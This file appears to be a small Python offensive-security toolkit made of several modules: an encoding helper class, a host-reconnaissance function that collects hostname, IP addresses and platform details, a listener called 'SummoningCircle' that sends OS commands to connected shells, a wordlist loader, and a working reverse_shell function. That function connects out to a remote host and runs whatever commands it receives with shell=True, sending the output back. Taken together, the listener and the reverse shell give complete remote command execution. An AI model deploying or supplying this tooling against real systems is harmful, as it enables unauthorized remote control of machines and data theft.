from base64 import urlsafe_b64decode, urlsafe_b64encode
import hashlib

from . import utils


class DecoderRing:
    """
    Many options for encoding / decoding.
    Also includes some encryption options such as MD5.
    """
    def __init__(self, data: str = '') -> None:
        self.data: str = data
        self.altered_data: str = ''

        self.shift: int = 0

        if not isinstance(data, str):
            raise TypeError("Input 'data' requires type 'str'.")

    def __call__(self):
        return {
            "data": self.data,
            "altered_data": self.altered_data
        }

    def _assign_data(self) -> str:
        """
        Use self.altered_data over self.data
        """
        if self.altered_data:
            return self.altered_data
        return self.data

    def set_data(self, data: str):
        """
        Setter function. To be used with interpreter.
        """
        self.data = data
        return self.data

    def base64(self, decode: bool = False) -> str:
        """
        By default, encode into Base64 string.
        """

        data = self._assign_data()

        if decode:
            decoded = urlsafe_b64decode(data)
            self.altered_data = decoded.decode()
            return self.altered_data

        encoded = urlsafe_b64encode(data.encode('utf-8'))
        self.altered_data = str(encoded, 'utf-8')
        return self.altered_data

    def hex(self, decode: bool = False) -> str:
        """
        By default, encode into Hexadecimal string
        """
        data = self._assign_data()

        if decode:
            self.altered_data = bytes.fromhex(data).decode('utf-8')
            return self.altered_data

        bytes_conversion = data.encode('utf-8')
        self.altered_data = bytes_conversion.hex()
        return self.altered_data

    def caeser(self, shift: int = 5, decode: bool = False) -> str:
        """
        Caeser's Cipher used on a string.
        """
        data = self._assign_data()

        if self.shift:
            shift = self.shift

        if decode:
            shift = -shift

        result = ""

        for char in data:
            if utils.is_not_ascii_letter(character=char):  # Account for spaces and special chars.
                result += char
            elif char.isupper():
                enciphered_index = (utils.ascii_to_index(letter=char) + shift) % 26
                result += utils.index_to_ascii(index=enciphered_index, capitalize=True)
            else:
                enciphered_index = (utils.ascii_to_index(letter=char) + shift) % 26
                result += utils.index_to_ascii(index=enciphered_index)
        return result

    def md5(self):
        """
        Encrypt string into MD5 hash.
        """
        data = self._assign_data()
        hashed_value = hashlib.md5(data.encode())
        return hashed_value.hexdigest()



import socket
import platform
import datetime


def os_specs():
    hostname = socket.gethostname()
    return {
        "hostname": hostname,
        "hostByHostname": socket.gethostbyname(hostname),
        "hostByAddress": list(socket.gethostbyname_ex(hostname)),
        "platform": {
            "system": platform.system(),
            "version": platform.version(),
            "platform": platform.platform(),
            "machine": platform.machine(),
            "processor": platform.processor()
        },
        "latestUpdate": datetime.datetime.now().strftime('%H%M-%d%m%Y')
    }



import socket
from threading import Thread
from select import select


class SummoningCircle:
    """
    Listener designed to work with Netcat reverse shells.
    """
    def __init__(
            self,
            local_host: str = '0.0.0.0',
            local_port: int = 5000,
            timeout_in_sec: int = 5,
            carriage_return: str = '\n'
    ):

        self.local_host = local_host
        self.local_port = local_port
        self.timeout_in_sec = timeout_in_sec
        self.carriage_return = carriage_return

        self.buffer_size = 1024 * 25

        self.server: socket = None
        self.clients: list[socket] = []

        self.active_session: socket = None

    def _bind_socket(self) -> None:
        """
        Start listening socket server.
        """
        try:

            self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.server.bind((self.local_host, self.local_port))
            self.server.listen(5)

            print(f"Listening for connection(s)...")

            while True:
                client_socket, client_address = self.server.accept()
                self.clients.append(client_socket)

                if not self.active_session:
                    self.active_session = client_socket

                print(f"Connection: {client_address[0]}:{client_address[1]}")

        except (socket.error, KeyboardInterrupt):
            return f'[-] Problem encountered: {socket.error} '

    def end_client_session(self, client_session: socket = None):
        """
        Exit client connection and close connection.
        Also, clean up 'self.clients' list.
        """

        if not client_session:
            client_session = self.active_session

        try:
            self.clients.remove(client_session)
            client_session.shutdown(socket.SHUT_RDWR)
            client_session.close()
        except (socket.error, OSError, ValueError):
            pass

    def send(self, command: str, client_session: socket = None) -> str:
        """
        Default way to send OS commands to the active connection's shell.
        """

        if not client_session:
            client_session = self.active_session

        client_session.send(f"{command}{self.carriage_return}".encode())

        # Confirm data is being sent with a timeout
        ready = select([client_session], [], [], self.timeout_in_sec)

        if ready[0]:
            return client_session.recv(self.buffer_size).decode()

        return 'Response timed Out.'

    def stop(self):
        """
        Close client connections and shutdown server.
        """
        try:
            for client in self.clients:
                client.close()
            self.server.shutdown(socket.SHUT_RDWR)
        except (socket.error, OSError, ValueError):
            pass
        self.server.close()

    def start(self):
        """
        Startup SummoningCircle in the background.
        Start interpreter.
        """
        listener = Thread(target=self._bind_socket)
        listener.start()
        return "Server started"



from os import path

"""
File System Magic
"""


def read_wordlist(file: str, wordlist: list = None):
    """
    Quick way to load a new wordlist from a file.
    :param file: Wordlist location
    :param wordlist: Append file contents to existing wordlist.
    :return: List of words
    """

    if not wordlist:
        wordlist = []

    if file and not path.isfile(file):
        raise FileNotFoundError(f"Cannot locate file {file}. Please ensure it exists.")

    with open(file, 'r') as f:
        for file_line in f:
            # skip line if starts with a comment
            if file_line.startswith("#"):
                continue
            wordlist.append(file_line.strip())
    return wordlist



import socket
from subprocess import run


def reverse_shell(remote_host: str, remote_port: int, buffer_size: int = 1024) -> None:
    """
    Opens a connection to a remote host.
    Allows remote host to execute OS commands on local system.

    Works with SummoningCircle().
    """

    # create the socket object
    s = socket.socket()
    # connect to the server
    s.connect((remote_host, remote_port))

    while True:
        # receive the command from the server
        command = s.recv(buffer_size).decode().split()

        if command[0].lower() == "exit":
            # if the command is exit, just break out of the loop
            break

        try:
            os_call = run(command, shell=True, capture_output=True)

            if os_call.returncode == 0:
                s.send(os_call.stdout)
            else:
                s.send(os_call.stderr)
        except FileNotFoundError:
            s.send(b"Error occurred.")

    # close client connection
    s.close()
